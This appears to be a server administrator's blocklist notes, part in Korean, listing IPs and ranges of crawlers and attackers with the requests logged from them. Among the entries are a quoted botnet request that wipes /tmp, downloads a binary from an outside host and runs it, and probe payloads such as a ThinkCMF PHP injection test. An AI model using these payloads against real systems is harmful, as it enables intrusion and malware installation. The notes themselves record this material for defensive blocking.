iP lIsT

firewall-cmd --permanent --add-rich-rule="rule family='ipv4' source address='ip-address' drop"

40.77.167.215: Microsoft / 40.74.0.0 - 40.125.127.255 / US / bingbot / w / 20200702
46.229.168.137 : ADVANCEDHOSTERS / 46.229.168.0/24 / US / bot / w / 20200702 - rpb 50%
66.249.71.125: Google / 66.249.64.0/19/ US / googlebot / w / 20201702
157.55.39.164 : Microsoft / 157.54.0.0/15, 157.56.0.0/14, 157.60.0.0/16 / US / bingbot / w / 20200702 px
203.133.169.241 : daum kakao, daou technology / 203.133.160.0/19 / KR / bot(crawler) / w / 20200702
207.46.13.40 : Microsoft / 207.46.0.0/16 / US / bingbot / w / 20200702
13.66.139.2 : Microsoft / 13.64.0.0/11, 13,96.0.0/13, 13.104.0.0/14 / US / msnbot / w / 20201103 px

195.54.160.21 : RIPC NCC / 195.54.160.0/24 / RU / ip_access, modsec_audit.log / 20200716 [dg] - 80%
195.54.160.135 : RIPC NCC / 195.54.160.0/24 / RU / ip_access, modsec_audit.log / 20200716 [dg] - 80%
51.144.83.227 : Microsoft / 51.140.0.0/14 , 51/144.0.0/15 / NL / "POST //xmlrpc.php HTTP/1.1" 200 424 /20200809 [dg] 80%
216.244.66.249 : Wowrack.com / 216.244.64.0/19 / US / "GET /robots.txt HTTP/1.1" 301 238 "-" ~ http://www.opensiteexplorer.org~ / 20200817 [dg] 100% 
61.219.11.153 : HINET-NET / 61.216.0.0/14 / TW / "GET / HTTP/1.0" 400 362 "-" "-" / 20200826 [BK] 100%
195.54.167.190 : RIPC NCC / 195.54.167.0/24 / RU / "POST //xmlrpc.php HTTP/1.1" 200 416 / 20200723
185.191.171.33 : bot.semrush.com / 185.191.171.0/24 / MD / "GET /bbs/board.php~ www.semrush.com/bot.html / 20200909 [BK] px
3.104.13.187 : Amazon Technologies Inc. / 3.0.0.0/9 / US / "GET /wp-content'uploads/2020/05/doc.php HTTP/1.1" 404 232 "http://site.ru" [dg] 90%   
     * cf) scamalytics.com/
39.105.53.67 : ALISOFT / 39.96.0.0/13, 39.104.0.0/14, 39.108.0.0/16 / CN / ip_access, get phpmyadmin.... / 20200914
120.206.184.145 : CMNET / 120.192.0.0/10 / CN / ip_access / 20200919
103.216.113.30 : ASVTECH-VN  / 103.216.112.0/22 / VN / "GET(POST) /wp-login.php(xmlrpc.php" 200 / 20200924
118.121.196.25 : CHINANET-SC / 118.120.0.0/14 / CN / ip_access...... / 20200924
176.113.115.214 : RU-REDBYTES / 176.113.115.0/24 / RU / ip_access...eval-stdin.php..... / 20200924
103.15.50.180 : MATBAO-VN / 103.15.48.0/22 / VN / "GET(POST) /wp-login.php HTTP/1.1" 200 nnn / 20200924 (3)
185.234.218.0 : WHF-NETWORK / 185.234.218.0/24 / IE / ip_access, GET /phpMyAdmin.... "404 /20201007
121.156.47.201 : HAIONNET / 121.128.0.0/11 / KR / ip_access, "404 / 20201025 - 하이온 VPN (국내 IP) vn
193.227.5.230 : N-R-N-M-A-B / 193.227.0.0/18/ EG / ip_access, "404 / 20201025
118.24.97.147: TENCENT-CN /118.24.0.0/15/CN/ip_access, "404 / 20201027 
62.234.79.142: N-R-N-M-A-B /62.234.0.0/16/CN/ip_access, "404 / 20201027 
178.128.34.135 : DIGITALOCEAN / 178.128.32.0/20 / GR:GB / "GET /wp-login.php | POST /xmlrpc.php" / 20201103 px
185.153.196.226 : -- / 185.153.196.0/24 / MD:UA / "GET /*.sql ..."404" / 20201103  px
193.27.229.26 : Hostway LLC / 193.27.228.0/23 / RU / "GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF)) / 20201103 px 
45.144.30.10 : LUDDA... / 45.144.28.0/22 / RU / "GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF)) / 20201103 px 
165.227.139.216 : DIGITALOCEAN / 165.227.128.0/20 / US / ip_access, ModSecurity: Access denied with code 400 / px 
193.169.253.128 : Fufo Studio / 193.169.253.0/24 / PL / MailServer_Access / 20201117 px

- bot -
54.197.222.220 : proximic  /  / NL / "GET /robots.txt, ads.txt HTTP/1.1" 200 www.proximic.com/info.spider.php/ 20211218

---

197.43.131.250 / 41.46.27.154
"GET /shell?cd+/tmp;rm+-rf+*;wget+185.132.53.147/hakaibin/h4k4i.arm7;chmod+777+/tmp/h4k4i.arm7;sh+/tmp/h4k4i.arm7+hakai.Rep.Jaws  HTTP/1.1" 404 203 "-" "Hello, world"

165.227.139.216 : DIGITALOCEAN-19 / 165.227.0.0/16 / DE(Germany) / ip_access, mod_security / 20201102 [dg] - 100%
  -> access /etc/httpd/conf.d/mod_security.conf | wp-login.php | xmlrpc.php
  -> 165.227.139.216 | 165.227.5.192 | 165.227.61.152 | 165.227.86.14 | 165.227.141.39 | 165.227.220.220.....

185.132.53.147 : 185.132.53.0/24 (185.132.53.0 ~ 185.132.53.255(4)) / PL(Poland), DE(Germany) / 20200908 / 

---

비정상적인 방법으로 서버에 접속을 시도하는 ip 목록

 검색엔진의 bot은 차단하면 안되겠지........

---

45.148.10.28
27.41.177.158
211.39.150.194,195 : google bot? (ad)

---

이것들을 어쩔까나....

petalsearch.com
mj12bot.com  (차단하기로...)

mj12bot ip-list

213.239.216.194 (213.239.192.0/18) #2021-12-09
192.99.15.29 (192.99.0.0/16) #2021-12-09
hold 75.119.142.113 (75.119.128.0/19) #2021-12-10 
      -for Mod_security (last log : [10/Dec/2021:02:53:01 +0900])
hold 144.76.176.171 () #2021-12-10 (last log : [10/Dec/2021:09:01:59 +0900])
hold 148.251.120.201 () #2021-12-10 (last log : [10/Dec/2021:05:58:59 +0900])
hold 5.9.108.254 () #2021-12-10 (last log : [10/Dec/2021:06:57:07 +0900])
hold 5.189.141.124 () #2021-12-10 (last log : [10/Dec/2021:08:40:11 +0900])

 

---

- New host WebPress.click -

62.151.182.240 / cider / US / MS: "GET, POST" "wp-login.php, xmlrpc.php"  / px / 210530
124.217.235.217 / cider / MY / "GET, POST" "wp-login.php, xmlrpc.php"  / px / 210530
45.151.249.80 / cider / NL /  "GET, POST" "wp-login.php"  / px / 210530
35.239.160.78 / cider / NL /  "GET" "/anydir/HTTP/1.1" 404  / px / 210530
123.58.210.246 / 123.58.192.0/19 / HK /  408  / px / 210530
178.150.14.250 / 178.150.14.0/24 / UA /  "GET /anydir/ " 301  / px / 210622 MJ12bbot
167.114.158.241 / 167.114.0.0/16 / CA /  "GET /anydir/ " 200  / px / 210624 MJ12bbot
159.89.89.205 / 159.89.0.0/16 / US / "GET /"wp-login.php/ " 200 / px / 210625 - DigitalOcean